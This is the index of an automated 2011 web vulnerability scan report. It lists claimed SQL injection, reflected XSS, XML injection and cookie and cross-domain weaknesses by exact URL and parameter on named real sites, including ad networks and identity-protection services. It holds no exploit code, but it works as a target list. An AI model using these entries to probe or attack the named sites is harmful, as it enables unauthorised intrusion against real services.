Vulnerable Applications, XSS, SQL Injection, DORK, GHDB Report for April 23, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Apr 24 09:09:29 CDT 2011.


Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.


1. SQL injection

1.1. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197 [REST URL parameter 3]

1.2. http://www.hotelclub.com/ [Referer HTTP header]

1.3. http://www.nextadvisor.com/link.php [__utma cookie]

2. File path traversal

3. LDAP injection

4. XPath injection

5. Cross-site scripting (reflected)

5.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [labels parameter]

5.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [redirecturl2 parameter]

5.3. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbdata2 parameter]

5.4. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbip parameter]

5.5. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [sz parameter]

5.6. http://ads.adxpose.com/ads/ads.js [uid parameter]

5.7. http://ar.voicefive.com/b/rc.pli [func parameter]

5.8. http://event.adxpose.com/event.flow [uid parameter]

5.9. http://ib.adnxs.com/ab [cnd parameter]

5.10. http://kroogy.com/favicon.ico [REST URL parameter 1]

5.11. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 1]

5.12. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 2]

5.13. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 1]

5.14. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 2]

5.15. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 1]

5.16. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 2]

5.17. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 1]

5.18. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 2]

5.19. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 1]

5.20. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 2]

5.21. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]

5.22. http://kroogy.com/search/emailafriend [REST URL parameter 1]

5.23. http://kroogy.com/search/emailafriend [REST URL parameter 2]

5.24. http://kroogy.com/search/images/blank.gif [REST URL parameter 2]

5.25. http://kroogy.com/search/index.php [page parameter]

5.26. http://kroogy.com/search/news [REST URL parameter 1]

5.27. http://kroogy.com/search/news [REST URL parameter 2]

5.28. http://kroogy.com/search/noresults [REST URL parameter 1]

5.29. http://kroogy.com/search/noresults [REST URL parameter 2]

5.30. http://kroogy.com/search/random.php [REST URL parameter 1]

5.31. http://kroogy.com/search/random.php [REST URL parameter 2]

5.32. http://kroogy.com/search/redir [REST URL parameter 1]

5.33. http://kroogy.com/search/redir [REST URL parameter 2]

5.34. http://kroogy.com/search/special [REST URL parameter 1]

5.35. http://kroogy.com/search/special [REST URL parameter 2]

5.36. http://kroogy.com/search/videos [REST URL parameter 1]

5.37. http://kroogy.com/search/videos [REST URL parameter 2]

5.38. http://kroogy.com/search/web [REST URL parameter 1]

5.39. http://kroogy.com/search/web [REST URL parameter 2]

5.40. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]

5.41. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]

5.42. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]

5.43. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]

5.44. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]

5.45. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]

5.46. http://widgets.digg.com/buttons/count [url parameter]

5.47. http://www.dictof.com/favicon.ico [REST URL parameter 1]

5.48. http://www.lifelock.com/offers/faces/female/ [promocodehide parameter]

5.49. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]

5.50. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 1]

5.51. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]

5.52. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]

5.53. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 3]

5.54. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 1]

5.55. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]

5.56. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]

5.57. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 3]

5.58. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

5.59. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

5.60. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]

5.61. http://www.nextadvisor.com/link.php [REST URL parameter 1]

5.62. http://www.nextadvisor.com/pmid [REST URL parameter 1]

5.63. http://www.nextadvisor.com/pmid [kw parameter]

5.64. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]

5.65. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]

5.66. http://www.nextadvisor.com/pmid/ [kw parameter]

5.67. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 1]

5.68. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]

5.69. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]

5.70. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 3]

5.71. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 1]

5.72. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]

5.73. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]

5.74. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 3]

5.75. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]

5.76. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]

5.77. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 2]

5.78. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]

5.79. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]

5.80. https://www.trustedid.com/idfide01/ [promoCodeRefIdf parameter]

5.81. https://www.trustedid.com/suzeidprotector/ [email parameter]

5.82. https://www.trustedid.com/suzeidprotector/ [first_name parameter]

5.83. https://www.trustedid.com/suzeidprotector/ [last_name parameter]

5.84. http://www.hotelclub.com/ [Referer HTTP header]

5.85. http://www.nextadvisor.com/link.php [Referer HTTP header]

5.86. http://www.nextadvisor.com/pmid [Referer HTTP header]

5.87. http://www.nextadvisor.com/pmid/ [Referer HTTP header]

5.88. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

5.89. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

5.90. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.91. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.92. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.93. http://breathe.c3metrics.com/c3realview.js [C3UID cookie]

5.94. http://www.lifelock.com/about/leadership/management/ [LifeLockEnrollment cookie]

5.95. http://www.lifelock.com/about/lifelock-in-the-community/ [LifeLockEnrollment cookie]

5.96. http://www.lifelock.com/guarantee/ [LifeLockEnrollment cookie]

5.97. http://www.lifelock.com/how-it-works/ [LifeLockEnrollment cookie]

5.98. http://www.lifelock.com/identity-theft/ [LifeLockEnrollment cookie]

6. Flash cross-domain policy

6.1. http://2byto.com/crossdomain.xml

6.2. http://4.bp.blogspot.com/crossdomain.xml

6.3. http://ad.amgdgt.com/crossdomain.xml

6.4. http://ad.doubleclick.net/crossdomain.xml

6.5. http://ajax.googleapis.com/crossdomain.xml

6.6. http://analytic.hotelclub.com/crossdomain.xml

6.7. http://ar.voicefive.com/crossdomain.xml

6.8. http://at.amgdgt.com/crossdomain.xml

6.9. http://b.scorecardresearch.com/crossdomain.xml

6.10. http://b.voicefive.com/crossdomain.xml

6.11. http://bh.contextweb.com/crossdomain.xml

6.12. http://bp.specificclick.net/crossdomain.xml

6.13. http://clk.atdmt.com/crossdomain.xml

6.14. http://ctix8.cheaptickets.com/crossdomain.xml

6.15. http://data.coremetrics.com/crossdomain.xml

6.16. http://ec.atdmt.com/crossdomain.xml

6.17. http://event.adxpose.com/crossdomain.xml

6.18. http://exch.quantserve.com/crossdomain.xml

6.19. http://fls.doubleclick.net/crossdomain.xml

6.20. http://ib.adnxs.com/crossdomain.xml

6.21. http://img1.wsimg.com/crossdomain.xml

6.22. http://img3.wsimg.com/crossdomain.xml

6.23. http://m.adnxs.com/crossdomain.xml

6.24. http://media.fastclick.net/crossdomain.xml

6.25. http://roia.biz/crossdomain.xml

6.26. http://s0.2mdn.net/crossdomain.xml

6.27. http://spe.atdmt.com/crossdomain.xml

6.28. http://switch.atdmt.com/crossdomain.xml

6.29. http://tracking.keywordmax.com/crossdomain.xml

6.30. http://www.dictof.com/crossdomain.xml

6.31. http://googleads.g.doubleclick.net/crossdomain.xml

6.32. http://i35.tinypic.com/crossdomain.xml

6.33. http://pagead2.googlesyndication.com/crossdomain.xml

6.34. http://partners.nextadnetwork.com/crossdomain.xml

6.35. http://www.apmebf.com/crossdomain.xml

6.36. http://www.emjcd.com/crossdomain.xml

6.37. http://www.kqzyfj.com/crossdomain.xml

6.38. http://www.securepaynet.net/crossdomain.xml

6.39. http://www.tqlkg.com/crossdomain.xml

6.40. http://media.compete.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://analytic.hotelclub.com/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://b.voicefive.com/clientaccesspolicy.xml

7.5. http://clk.atdmt.com/clientaccesspolicy.xml

7.6. http://ec.atdmt.com/clientaccesspolicy.xml

7.7. http://s0.2mdn.net/clientaccesspolicy.xml

7.8. http://spe.atdmt.com/clientaccesspolicy.xml

7.9. http://switch.atdmt.com/clientaccesspolicy.xml

7.10. http://ts1.mm.bing.net/clientaccesspolicy.xml

7.11. http://ts2.mm.bing.net/clientaccesspolicy.xml

8. Cleartext submission of password

9. XML injection

9.1. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 1]

9.2. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 2]

9.3. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 1]

9.4. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 2]

9.5. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 3]

9.6. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 1]

9.7. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 2]

9.8. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 3]

9.9. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 4]

9.10. http://kroogy.com/search/images/blank.gif [REST URL parameter 3]

9.11. http://www.dictof.com/favicon.ico [REST URL parameter 1]

10. SSL cookie without secure flag set

10.1. https://secure.identityguard.com/EnrollmentStep1

10.2. https://secure.lifelock.com/portal/login

10.3. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

10.4. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff

10.5. https://secure.lifelock.com/enrollment

10.6. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

10.7. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

10.8. https://secure.lifelock.com/scripts/global.js

10.9. https://secure.lifelock.com/styles/login.css

10.10. https://secure.lifelock.com/styles/theme-lifelock.css

10.11. https://secure.lifelock.com/styles/webstore.css

10.12. https://www.trustedid.com/idfide01/

10.13. https://www.trustedid.com/suzeidprotector/

11. Session token in URL

11.1. http://bh.contextweb.com/bh/set.aspx

11.2. https://secure.lifelock.com/portal/login

11.3. https://www.econsumer.equifax.com/otc/landing.ehtml

12. SSL certificate

12.1. https://secure.identityguard.com/

12.2. https://secure.lifelock.com/

12.3. https://www.econsumer.equifax.com/

12.4. https://www.pcisecuritystandards.org/

12.5. https://www.trustedid.com/

13. Open redirection

14. Cookie without HttpOnly flag set

14.1. http://ads.adxpose.com/ads/ads.js

14.2. http://affiliate.idgtracker.com/rd/r.php

14.3. http://event.adxpose.com/event.flow

14.4. http://img.securepaynet.net/image.aspx

14.5. http://leadback.netseer.com/dsatserving2/servlet/log

14.6. https://secure.identityguard.com/EnrollmentStep1

14.7. https://secure.lifelock.com/portal/login

14.8. http://www.dictof.com/

14.9. https://www.econsumer.equifax.com/otc/landing.ehtml

14.10. http://www.hotelclub.com/

14.11. http://www.identityguard.com/ipages/le4/styles/ie.css

14.12. http://www.lunlizy.net/

14.13. http://www.nextadvisor.com/link.php

14.14. http://2byto.com/bluepixel/cnt-gif1x1.php

14.15. http://2byto.com/bluepixel/cnt-gif1x1.php

14.16. http://ad.amgdgt.com/ads/

14.17. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct

14.18. http://ad.doubleclick.net/adj/inet.hostcat/_default

14.19. http://ad.yieldmanager.com/pixel

14.20. http://ads.revsci.net/adserver/ako

14.21. http://ads.revsci.net/adserver/ako

14.22. http://ads.revsci.net/adserver/ako

14.23. http://ads.revsci.net/adserver/ako

14.24. http://ads.revsci.net/adserver/ako

14.25. http://ads.revsci.net/adserver/ako

14.26. http://ads.revsci.net/adserver/ako

14.27. http://ads.revsci.net/adserver/ako

14.28. http://ads.revsci.net/adserver/ako

14.29. http://affiliate.idgtracker.com/rd/r.php

14.30. http://affiliate.idgtracker.com/rd/r.php

14.31. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197

14.32. http://ar.voicefive.com/b/wc_beacon.pli

14.33. http://ar.voicefive.com/bmx3/broker.pli

14.34. http://at.amgdgt.com/ads/

14.35. http://b.scorecardresearch.com/p

14.36. http://b.voicefive.com/b

14.37. http://bh.contextweb.com/bh/set.aspx

14.38. http://clk.atdmt.com/go/253732016/direct

14.39. http://cmi.netseer.com/match

14.40. http://cmi.netseer.com/redirect

14.41. http://ctix8.cheaptickets.com/dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif

14.42. http://img167.imageshack.us/img167/6361/06ls4.jpg

14.43. http://img262.imageshack.us/img262/3146/17ls3.jpg

14.44. http://kroogy.com/

14.45. http://leadback.advertising.com/adcedge/lb

14.46. http://media.fastclick.net/w/tre

14.47. http://partners.nextadnetwork.com/z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04

14.48. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471

14.49. http://partners.nextadnetwork.com/z/48/CD1/945440258

14.50. http://partners.nextadnetwork.com/z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01

14.51. http://partners.nextadnetwork.com/z/518/CD1/idf+903230053

14.52. http://pixel.mathtag.com/event/img

14.53. http://pixel.rubiconproject.com/tap.php

14.54. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

14.55. http://roia.biz/im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A

14.56. http://roia.biz/im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A

14.57. http://sales.liveperson.net/hc/71003277/

14.58. http://sales.liveperson.net/hc/71003277/

14.59. http://sales.liveperson.net/hc/71003277/

14.60. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

14.61. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff

14.62. https://secure.lifelock.com/enrollment

14.63. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

14.64. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

14.65. https://secure.lifelock.com/scripts/global.js

14.66. https://secure.lifelock.com/styles/login.css

14.67. https://secure.lifelock.com/styles/theme-lifelock.css

14.68. https://secure.lifelock.com/styles/webstore.css

14.69. http://stats.kroogy.com/cnt-gif1x1.php

14.70. http://stats.kroogy.com/cnt-gif1x1.php

14.71. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

14.72. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

14.73. http://www.googleadservices.com/pagead/aclk

14.74. http://www.identityguard.com/gscc.aspx

14.75. http://www.lifelock.com/about/leadership/management/

14.76. http://www.lifelock.com/about/lifelock-in-the-community/

14.77. http://www.lifelock.com/guarantee/

14.78. http://www.lifelock.com/how-it-works/

14.79. http://www.lifelock.com/identity-theft/

14.80. http://www.lifelock.com/offers/faces/female/

14.81. http://www.nextadvisor.com/link.php

14.82. http://www.revresda.com/js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en&currency=USD&subdomain=HCAU&channel=home&Section=main&adsize=160x600&pos=external&country=US

14.83. http://www.revresda.com/js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en&currency=USD&subdomain=HCAU&channel=home&Section=main&adsize=728x90&pos=bottom&country=US

14.84. http://www.securepaynet.net/default.aspx

14.85. http://www.securepaynet.net/external/json/SalesBanner.aspx

14.86. https://www.trustedid.com/idfide01/

14.87. https://www.trustedid.com/registration.php

14.88. https://www.trustedid.com/suzeidprotector/

15. Password field with autocomplete enabled

15.1. https://secure.lifelock.com/portal/login

15.2. https://secure.lifelock.com/portal/login

15.3. https://secure.lifelock.com/portal/login

15.4. https://secure.lifelock.com/portal/login

15.5. https://secure.lifelock.com/portal/login

15.6. https://secure.lifelock.com/portal/login

15.7. https://secure.lifelock.com/portal/login

15.8. http://www.dictof.com/

15.9. http://www.hotelclub.com/

15.10. http://www.securepaynet.net/default.aspx

16. Referer-dependent response

16.1. http://breathe.c3metrics.com/c3realview.js

16.2. http://www.dictof.com/

16.3. http://www.securepaynet.net/default.aspx

17. Cross-domain POST

18. Cookie scoped to parent domain

18.1. http://ad.amgdgt.com/ads/

18.2. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct

18.3. http://ad.doubleclick.net/adj/inet.hostcat/_default

18.4. http://ads.revsci.net/adserver/ako

18.5. http://ads.revsci.net/adserver/ako

18.6. http://ads.revsci.net/adserver/ako

18.7. http://ads.revsci.net/adserver/ako

18.8. http://ads.revsci.net/adserver/ako

18.9. http://ads.revsci.net/adserver/ako

18.10. http://ads.revsci.net/adserver/ako

18.11. http://ads.revsci.net/adserver/ako

18.12. http://ads.revsci.net/adserver/ako

18.13. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197

18.14. http://ar.voicefive.com/b/wc_beacon.pli

18.15. http://ar.voicefive.com/bmx3/broker.pli

18.16. http://at.amgdgt.com/ads/

18.17. http://b.scorecardresearch.com/p

18.18. http://b.voicefive.com/b

18.19. http://bh.contextweb.com/bh/set.aspx

18.20. http://clk.atdmt.com/go/253732016/direct

18.21. http://cmi.netseer.com/match

18.22. http://cmi.netseer.com/redirect

18.23. http://ib.adnxs.com/ab

18.24. http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk

18.25. http://ib.adnxs.com/seg

18.26. http://img.securepaynet.net/image.aspx

18.27. http://img167.imageshack.us/img167/6361/06ls4.jpg

18.28. http://img262.imageshack.us/img262/3146/17ls3.jpg

18.29. http://leadback.advertising.com/adcedge/lb

18.30. http://leadback.netseer.com/dsatserving2/servlet/log

18.31. http://m.adnxs.com/msftcookiehandler

18.32. http://media.fastclick.net/w/tre

18.33. http://pixel.mathtag.com/event/img

18.34. http://pixel.rubiconproject.com/tap.php

18.35. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

18.36. http://sales.liveperson.net/hc/71003277/

18.37. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

18.38. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

18.39. http://www.securepaynet.net/default.aspx

18.40. http://www.securepaynet.net/external/json/SalesBanner.aspx

18.41. https://www.trustedid.com/idfide01/

18.42. https://www.trustedid.com/registration.php

18.43. https://www.trustedid.com/suzeidprotector/

19. Cross-domain Referer leakage

19.1. http://ad.amgdgt.com/ads/

19.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15

19.3. http://ad.doubleclick.net/adj/inet.hostcat/_default

19.4. http://bp.specificclick.net/

19.5. http://cm.g.doubleclick.net/pixel

19.6. http://fls.doubleclick.net/activityi

19.7. http://googleads.g.doubleclick.net/pagead/ads

19.8. http://googleads.g.doubleclick.net/pagead/ads

19.9. http://googleads.g.doubleclick.net/pagead/ads

19.10. http://googleads.g.doubleclick.net/pagead/ads

19.11. http://googleads.g.doubleclick.net/pagead/ads

19.12. http://googleads.g.doubleclick.net/pagead/ads

19.13. http://googleads.g.doubleclick.net/pagead/ads

19.14. http://googleads.g.doubleclick.net/pagead/ads

19.15. http://googleads.g.doubleclick.net/pagead/ads

19.16. http://googleads.g.doubleclick.net/pagead/ads

19.17. http://googleads.g.doubleclick.net/pagead/ads

19.18. http://ib.adnxs.com/ab

19.19. http://kroogy.com/search/emailafriend

19.20. http://kroogy.com/search/noresults

19.21. http://kroogy.com/search/web

19.22. http://pub.retailer-amazon.net/banner_120_600_b.php

19.23. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

19.24. https://secure.lifelock.com/enrollment

19.25. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

19.26. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

19.27. https://www.econsumer.equifax.com/otc/landing.ehtml

19.28. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

19.29. http://www.hotelclub.com/common/adRevresda.asp

19.30. http://www.hotelclub.com/common/adRevresda.asp

19.31. http://www.identityguard.com/gscc.aspx

19.32. http://www.identityguard.com/ipages/le4/letp30daysfree1.html

19.33. http://www.kqzyfj.com/click-1911961-10751987

19.34. http://www.kqzyfj.com/click-1911961-10751987

19.35. http://www.lifelock.com/offers/faces/female/

19.36. http://www.securepaynet.net/default.aspx

19.37. https://www.trustedid.com/idfide01/

19.38. https://www.trustedid.com/registration.php

19.39. https://www.trustedid.com/suzeidprotector/

20. Cross-domain script include

20.1. http://ad.amgdgt.com/ads/

20.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15

20.3. http://googleads.g.doubleclick.net/pagead/ads

20.4. http://googleads.g.doubleclick.net/pagead/ads

